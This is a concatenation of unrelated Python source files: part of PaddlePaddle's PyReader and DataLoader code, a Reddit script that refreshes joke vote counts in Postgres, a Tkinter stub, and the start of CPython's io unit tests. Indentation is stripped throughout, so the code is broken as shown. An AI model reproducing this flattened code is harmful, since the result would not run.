reader = BatchedTensorProvider(
feed_list=self._feed_list,
place=core.CPUPlace(),
batch_size=batch_size,
generator=reader,
drop_last=drop_last)
self.set_batch_generator(reader, places=places)
return self
def set_sample_list_generator(self, reader, places=None):
with program_guard(Program(), Program()):
feeder = DataFeeder(
feed_list=self._feed_list, place=core.CPUPlace())
paddle_reader = feeder.decorate_reader(reader, multi_devices=False)
def __tensor_reader_impl__():
for slots in paddle_reader():
yield [slots[var.name] for var in self._feed_list]
self.set_batch_generator(__tensor_reader_impl__, places)
return self
def set_batch_generator(self, reader, places=None):
self._tensor_reader = reader
if self._iterable:
assert places is not None, "Places cannot be None when DataLoader is iterable"
self._places = _convert_places(places)
else:
if places is not None:
logging.info(
'places would be omitted when DataLoader is not iterable')
return self
class PyReader(DataLoaderBase):
"""
Create a reader object for data feeding in Python.
Data will be prefetched by a Python thread and pushed
into a queue asynchronously. Data in the queue will be extracted
automatically when `Executor.run(...)` is called.
Args:
feed_list (list(Variable)|tuple(Variable)): feed variable list.
The variables should be created by :code:`fluid.layers.data()`.
capacity (int): capacity of the queue maintained in PyReader.
The unit is batch number. Set larger capacity if your reader
is fast.
use_double_buffer (bool): whether to use double_buffer_reader.
If use_double_buffer=True, PyReader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupies a little more CPU or GPU memory, i.e., the memory
of one batch input data.
iterable (bool): whether the created PyReader is iterable.
return_list (bool): whether the return value on each device is
presented as a list. It is only valid when iterable=True.
If return_list=False, the return value on each device would
be a dict of str -> LoDTensor, where the key of the dict is
the name of each fed variable. If return_list=True, the
return value on each device would be a list(LoDTensor). It is
recommended to use return_list=False in static graph mode and
use return_list=True in dygraph mode.
Returns:
the created reader object.
Return type:
reader(Reader)
Examples:
1. If iterable = False, the created PyReader object is almost the
same as :code:`fluid.layers.py_reader()`. Operators would be
inserted into the program. User should call :code:`start()`
before each epoch and catch :code:`fluid.core.EOFException`
thrown by :code:`Executor.run()` when epoch ends. Once the
exception is caught, user should call :code:`reset()` to reset
the reader manually.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 5
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def reader_creator_random_image_and_label(height, width):
def reader():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return reader
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label],
capacity=4,
iterable=False)
user_defined_reader = reader_creator_random_image_and_label(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE))
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(EPOCH_NUM):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
2. If iterable=True, the created PyReader object is decoupled with
the program. No operator would be inserted into the program.
In this case, the created reader is a Python generator, which
is iterable. User should feed the data yielded from PyReader
object into :code:`Executor.run(feed=...)`.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 5
BATCH_SIZE = 10
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def reader_creator_random_image(height, width):
def reader():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0, high=255, size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return reader
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True, return_list=False)
user_defined_reader = reader_creator_random_image(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE),
fluid.core.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
3. If return_list=True, the return values would be presented as list instead of dict.
This is usually used in dygraph mode.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
ITER_NUM = 5
BATCH_SIZE = 10
def reader_creator_random_image(height, width):
def reader():
for i in range(ITER_NUM):
yield np.random.uniform(low=0, high=255, size=[height, width]), \
np.random.random_integers(low=0, high=9, size=[1])
return reader
place = fluid.CPUPlace()
with fluid.dygraph.guard(place):
py_reader = fluid.io.PyReader(capacity=2, return_list=True)
user_defined_reader = reader_creator_random_image(784, 784)
py_reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE),
place)
for image, label in py_reader():
relu = fluid.layers.relu(image)
"""
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False):
self._loader = DataLoader.from_generator(
feed_list, capacity, use_double_buffer, iterable, return_list)
@property
def queue(self):
return self._loader.queue
@property
def iterable(self):
return self._loader.iterable
def __iter__(self):
return self._loader.__iter__()
def __next__(self):
return self._loader.__next__()
def start(self):
'''
Start the data feeding thread.
Can only call when the reader object is not iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
BATCH_SIZE = 10
def generator():
for i in range(5):
yield np.random.uniform(low=0, high=255, size=[784, 784]),
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
reader = fluid.io.PyReader(feed_list=[image], capacity=4, iterable=False)
reader.decorate_sample_list_generator(
paddle.batch(generator, batch_size=BATCH_SIZE))
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(3):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
'''
self._loader.start()
def reset(self):
'''
Reset the reader object when :code:`fluid.core.EOFException` raises.
Can only call when the reader object is not iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
BATCH_SIZE = 10
def generator():
for i in range(5):
yield np.random.uniform(low=0, high=255, size=[784, 784]),
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
reader = fluid.io.PyReader(feed_list=[image], capacity=4, iterable=False)
reader.decorate_sample_list_generator(
paddle.batch(generator, batch_size=BATCH_SIZE))
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(3):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
'''
self._loader.reset()
def decorate_sample_generator(self,
sample_generator,
batch_size,
drop_last=True,
places=None):
'''
Set the data source of the PyReader object.
The provided :code:`sample_generator` should be a Python generator,
which yields list(numpy.ndarray)-typed data of each sample.
:code:`places` must be set when the PyReader object is iterable.
If all inputs have no lods, this method is faster than
:code:`decorate_sample_list_generator(paddle.batch(sample_generator, ...))` .
Args:
sample_generator (generator): Python generator that yields
list(numpy.ndarray)-typed sample data.
batch_size (int): batch size. Must be larger than 0.
drop_last (bool): Whether to drop the last batch when sample number
is less than batch_size.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.array([1])
yield fake_image, fake_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_sample_generator(user_defined_generator,
batch_size=BATCH_SIZE,
places=[fluid.CPUPlace()])
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_sample_generator(sample_generator, batch_size,
drop_last, places)
def decorate_sample_list_generator(self, reader, places=None):
'''
Set the data source of the PyReader object.
The provided :code:`reader` should be a Python generator,
which yields list(numpy.ndarray) typed batched data.
:code:`places` must be set when the PyReader object is iterable.
Args:
reader (generator): Python generator that yields
list(numpy.ndarray)-typed batched data.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_generator, batch_size=BATCH_SIZE),
fluid.core.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.core.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_sample_list_generator(reader, places)
def decorate_batch_generator(self, reader, places=None):
'''
Set the data source of the PyReader object.
The provided :code:`reader` should be a Python generator,
which yields numpy.ndarray-typed or LoDTensor-typed batched data.
:code:`places` must be set when the PyReader object is iterable.
Args:
reader (generator): Python generator that yields LoDTensor-typed
batched data.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
batch_image = np.random.uniform(low=0,
high=255,
size=[BATCH_SIZE, height, width])
batch_label = np.ones([BATCH_SIZE, 1])
batch_image = batch_image.astype('float32')
batch_label = batch_label.astype('int64')
yield batch_image, batch_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_batch_generator(user_defined_generator, fluid.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_batch_generator(reader, places)
class DatasetLoader(DataLoaderBase):
def __init__(self, dataset, places, drop_last):
assert isinstance(dataset, paddle.distributed.fleet.dataset.
DatasetBase), "dataset must be type of DatasetBase"
assert not in_dygraph_mode(
), "DatasetLoader is not supported in dygraph mode yet"
thread_num = len(places)
assert len(dataset.filelist) >= thread_num, \
"Filelist number of dataset {} must be not less than place number {}".format(len(dataset.filelist), thread_num)
if dataset.thread_num != 0 and dataset.thread_num != thread_num:
logging.warn('thread_num {} which is set in Dataset is ignored'.
format(dataset.thread_num))
dataset._set_thread(thread_num)
if isinstance(dataset, paddle.distributed.fleet.dataset.
InMemoryDataset) and dataset.queue_num > thread_num:
logging.warn("queue_num {} which is set in Dataset is ignored".
format(dataset.queue_num))
dataset._set_queue_num(thread_num)
self._dataset = dataset
use_slots = [
slot.name for slot in dataset.proto_desc.multi_slot_desc.slots
if slot.is_used
]
self._iterable_dataset = core.IterableDatasetWrapper(
dataset.dataset, use_slots,
_convert_places(places), dataset.proto_desc.batch_size, drop_last)
def __iter__(self):
self._dataset._finish_to_run()
self._dataset._prepare_to_run()
self._iterable_dataset._start()
return self
def __next__(self):
return self._iterable_dataset._next()
|
reddit-update.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
#-------------------------------------------------------------------------------
Project : Project JaaS
Module : reddit
Purpose : Reddit API Wrapper
Version : 0.1.1 beta
Status : Development
Modified : 2020 Mar 04
Created : 2020 Mar 04
Author : Burak Tokman
Email : buraktokman@hotmail.com
Copyright : 2020, Bulrosa OU
Licence : EULA
Unauthorized copying of this file, via any medium is strictly prohibited
Proprietary and confidential
#-------------------------------------------------------------------------------
'''
from pathlib import Path
from psaw import PushshiftAPI
from datetime import datetime as dt
from colorama import Fore, Back, Style
import os
import sys
import time
import threading
import json
import requests
import random
import praw
sys.path.insert(0, str(Path(Path(__file__).parents[0] / 'lib')))
import logz
import postgres
# Reddit Dev > https://www.reddit.com/prefs/apps
CONFIG = {'secret_key': '',
'personal_key': '',
'name': 'jaas_dev',
'username': '', # Reddit User
'password': '',
'redirect_url': 'http://localhost:8080',
'thread-count': 8,
# 'refresh-interval': 24 * 60 # hours
}
def thread_update(reddit, jokes):
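# Worker routine: for each joke, look up its Reddit submission by id and refresh
# the stored upvote ratio, comment count and vote count in Postgres.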
print(f"{logz.timestamp()}{Fore.YELLOW} REDDIT → INIT → {Style.RESET_ALL}Skip posts older than 30 days", end='')
print(f"{logz.timestamp()}{Fore.YELLOW} REDDIT → INIT → {Style.RESET_ALL}Skip posts updated within 1 day", end='')
for joke in jokes:
#
# INCOMPLETE
#
# Skip if older than 30 days
time_diff_unix = int(time.time()) - int(time.mktime(dt.strptime(joke['time_add_original'], "%Y-%m-%d %H:%M:%S").timetuple()))
if time_diff_unix > 60 * 60 * 24 * 30:
# print(f"f_id={joke['id']} > skip, posted more than 30 days ago")
continue
# Skip if updated within the last day
if joke['time_update'] is not None:
time_diff_unix = int(time.time()) - int(time.mktime(dt.strptime(joke['time_update'], "%Y-%m-%d %H:%M:%S").timetuple()))
if 60 * 60 * 24 * 1 > time_diff_unix:
# print(f"f_id={joke['id']} > skip, updated within the last day")
continue
# https://www.reddit.com/r/Jokes/comments/coj45m/if_your_surprised_that_jeffrey_epstein_commited/
j_id = joke['url'].split('comments/')[1].split('/')[0]
submission = reddit.submission(id=j_id)
# Check Upvote Ratio
if hasattr(submission, 'upvote_ratio'):
rating = submission.upvote_ratio
else:
rating = None
# ------ UPDATE RATING / COMMENTS / VOTE -------
print(f"UPDATE {j_id}\trating={rating}\tcomments={submission.num_comments}\tvotes={submission.score}")
# print('Updating rating, comments & vote count')
# Update Rating
r = postgres.set_joke_rating(joke_id=joke['id'], rating=rating)
# Update Comment Count
r = postgres.set_joke_comment_count(joke_id=joke['id'], comment_count=submission.num_comments)
# Update Vote Count
r = postgres.set_joke_vote_count(joke_id=joke['id'], vote_count=submission.score)
# Update Time
#
# INCOMPLETE - This Op. takes much time!
#
r = postgres.set_joke_time_update(joke_id=joke['id'], time_update=None)
print('thread finished')
def main():
# Configure
global CONFIG
reddit = praw.Reddit(client_id=CONFIG['personal_key'],
client_secret=CONFIG['secret_key'],
user_agent=CONFIG['name'],
username=CONFIG['username'],
password=CONFIG['password'])
# Connect to DB
postgres.connect_db()
# Start Fetch
time_start = time.time()
# Fetch Jokes
print(f"{logz.timestamp()}{Fore.YELLOW} REDDIT → INIT → {Style.RESET_ALL}Fething all jokes...")
jokes = postgres.get_joke_all()
# ------------- MULTIPLE THREADS ---------------
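# Split the joke list round-robin so each worker thread gets roughly an equal share.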
if CONFIG['thread-count'] != 1:
jokes_thread = [jokes[i::CONFIG['thread-count']] for i in range(CONFIG['thread-count'])]
else:
jokes_thread = [jokes]
print(f"{logz.timestamp()}{Fore.YELLOW} REDDIT → {Style.RESET_ALL}Starting threads")
# Define threads
threads = []
for x in range(0, CONFIG['thread-count']):
thread_name = 'T' + str(x) + '-update-jokes'
t = threading.Thread(name=thread_name, target=thread_update, args=(reddit, jokes_thread[x], ))
threads.append(t)
# Start threads
for x in range(0, CONFIG['thread-count']):
# print(f"{logz.timestamp()}{Fore.YELLOW} REDDIT → {Style.RESET_ALL}THREAD {x} → Started")
threads[x].start()
# Wait threads
for x in range(0, CONFIG['thread-count']):
threads[x].join()
# print(f"{logz.timestamp()}{Fore.YELLOW} REDDIT → {Style.RESET_ALL}Thread {x} finished in {round((time.time() - time_start) / 60, 2)} mins")
print(f"{logz.timestamp()}{Fore.YELLOW} REDDIT → {Style.RESET_ALL}All threads finished in {round((time.time() - time_start) / 60, 2)} mins")
# ------ SLEEP ---------------------------------
# print(f"{logz.timestamp()}{Fore.YELLOW} REDDIT → COMPLETED → {Style.RESET_ALL}Sleeping {CONFIG['refresh-interval'] * 60}mins")
# time.sleep(CONFIG['refresh-interval'] * 60)
# ----------------------------------------------
if __name__ == '__main__':
main()
|
test.py
|
import tkinter
import tkinter as tk
from tkinter import ttk
def GUITEST():
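# Open an 800x400 Tkinter window containing a single Text widget; the timer and
# label wiring below is left commented out.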
# print(ttp._getNowTime())
root=tkinter.Tk()
root.geometry("800x400")
#print(datetime.datetime.now(), datetime.date.today())
# Frame=ttk.Frame(root, padding=16)
# Label=tkinter.Label(text="現在時刻は"+str(ttp._getNowTime()))
# Timer=threading.Thread(target=updateTime)
# Timer.start()
textWidget=tk.Text(root)
textWidget.grid(column=0,row=0,sticky=(tk.N,tk.S,tk.E,tk.W))
# Entry = ttk.Entry(Frame, textvariable=setTimer)
# Frame.pack()
# Entry.pack()
# Label.pack()
# root.columnconfigure(0, weight=1)
# root.rowconfigure(0, weight=1)
root.mainloop()
# setTimer(60)
count=0
|
test_io.py
|
# expected: fail
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
from __future__ import print_function
from __future__ import unicode_literals
import os
import sys
import time
import array
import random
import unittest
import weakref
import warnings
import abc
import signal
import errno
from itertools import cycle, count
from collections import deque
from UserList import UserList
from test import test_support as support
import contextlib
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import threading
except ImportError:
threading = None
try:
import fcntl
except ImportError:
fcntl = None
__metaclass__ = type
bytes = support.py3k_bytes
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with io.open(__file__, "r", encoding="latin1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
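# Serve reads from the pre-seeded read stack: an exhausted stack counts as an
# extraneous read, a None entry simulates "no data available", and an entry
# longer than the buffer is split, keeping the remainder for the next call.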
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return MockRawIO.write(self, b) * 2
def read(self, n=None):
return MockRawIO.read(self, n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
MockRawIO.readinto(self, buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise IOError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super(MockFileIO, self).__init__(data)
def read(self, n=None):
res = super(MockFileIO, self).read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super(MockFileIO, self).readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
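# Exercise write-side behaviour: the interplay of write/tell/seek/truncate,
# including the rule that truncate() does not move the current file position.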
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
self.assertEqual(f.write(bytearray(b" world\n\n\n")), 9)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = bytearray(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(data, b" worl")
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(bytearray(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(bytearray()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
self.assertEqual(f.seek(self.LARGE), self.LARGE)
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(IOError, fp.read)
self.assertRaises(IOError, fp.readline)
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(IOError, fp.write, b"blah")
self.assertRaises(IOError, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(IOError, fp.write, "blah")
self.assertRaises(IOError, fp.writelines, ["blah\n"])
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OS X this test consumes large resources; it takes
# a long time to build the >2GB file and takes >2GB of disk space,
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1 // 0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1 // 0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertTrue(f.tell() > 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super(MyFileIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyFileIO, self).close()
def flush(self):
record.append(3)
super(MyFileIO, self).flush()
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super(MyIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super(MyIO, self).close()
def flush(self):
record.append(self.on_flush)
super(MyIO, self).flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
